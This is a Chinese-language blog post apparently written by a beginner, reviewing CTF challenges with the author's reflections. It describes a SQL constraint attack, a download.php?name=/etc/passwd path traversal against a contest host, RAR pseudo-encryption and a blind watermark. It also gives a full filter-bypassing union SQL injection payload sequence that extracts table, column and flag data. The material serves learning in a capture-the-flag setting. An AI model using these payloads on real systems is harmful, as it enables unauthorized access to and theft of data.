第一次做题,知道差距在哪了,被打的落花流水,片甲不留,总之非常失败吧,只做题不整理的都是耍流氓,改变耍流氓。
后台管理系统
这道题考察的是sql约束攻击,在Bugku中遇到过,当时做的时候没想到,知识还是不够全面。
这个博客讲的比较详细,其中也有bugku中的题目
sql约束攻击总结
跟bugku中的题目基本上一模一样,害,还是因为没整理,做过的都没印象,注册admin+空格(上边链接有原理),任意密码,然后用admin+密码登录就拿到了flag,很简单有木有,可是想不到就不知道。。。
阿童木爱好者小站
打开看到有16张图片,图片我就联想到了杂项,果然太菜,然后一个个保存,用binwalk分析,啥都没有,然后还用了stegsolve,毛都没有。。。然后我看了看源代码,题目突破口被我完美错过,看了一点感觉都没有,还是菜,害!
题目突破口download.php?name= 这么明显的突破口竟然没感觉,还是刷题少。。但是就算我找到了突破口,我也做不出来,name传的值是我的盲区。盲区太多了
name传的值是/etc目录,之前完全没接触。。奇怪的知识+1。/etc目录详解
这一题就是获取用户数据库中的数据,flag就在数据库中。
构建payload:http://156eeea58ba695c8.yunyansec.com/download.php?name=/etc/passwd,下载数据库信息,打开发现最后的base64编码flag。
解码得到
打假
这道题在做的时候就知道是rar的伪加密,但是之前没做过,不会解,搜了好多也没发现有用的信息,其实会做之后也挺简单。。还是还是知识储备不够!打开网页下载flag.rar,然后用winhex打开,修改一个数据就好了。
把第二行的第八个数据修改为80就解密了,但是师傅讲的时候是修改的84,但是弄了好久没弄好,最后还是问了小伙伴。奇怪的知识+2
大学生活
看url明显的sql注入,放到sqlmap里边没跑出来,然后我就手工注入,但是发现只有一个回显,我以为是盲注,手工盲注。。我就放弃了,但是他不是。。只是过滤了很多东西,构造的语句不对,过滤了空格,order…用//代替空格,也可以用()。
放上师傅的语句
?id=1//%26//1
?id=1//%26//0
?id=1//group//by//6
?id=-1//union//select//1,database(),3,4,5,6,7
?id=-2//union//select//1,group_concat(table_name),3,4,5,6,7//from//information_schema.tables//where//!(table_schema<>“web”)
?id=-2//union//select//1,group_concat(column_name),3,4,5,6,7//from//information_schema.columns//where//!(table_name<>“flag”)
?id=-2//union//select//1,flag,3,4,5,6,7//from//flag
得到flag
手绘
打开就一张图片,这铁杂项了吧,用binwalk看一下,里边还有一张png图片,dd或者foremost提取一下,提取出来是两张一模一样的,两张图片考察盲水印。赛前培训有讲到,可是我没听。。遗憾。
用github上的脚本跑一下,但是python没有cv2模块,跑不出来,整了一下午也没搞好,搞好再试吧。
find the hacker
打开好多登录信息,没有头绪,小伙伴说一个一个试,数据太多了,试了几个 ,找一下有什么不同的地方,前边都是404,我认为的是还没有被爆破,然后继续往下找,然后找到了302/304,在一堆302中试了一下,没用,我就想着肯定是在这临界的地方,然后往下找,在一堆200中发现了302,然后就去试了一下,就找到了
还有一个ssti的题目,但是一直报错,也没找到flag,等以后慢慢摸索吧,另一个web题我感觉有点难,用到了php伪协议接触过,但是当初做题的时候没想到,通过php://filter读出三个文件,然后代码审计,用到了session,盲区。还是增长了不少知识。难题后边慢慢整理。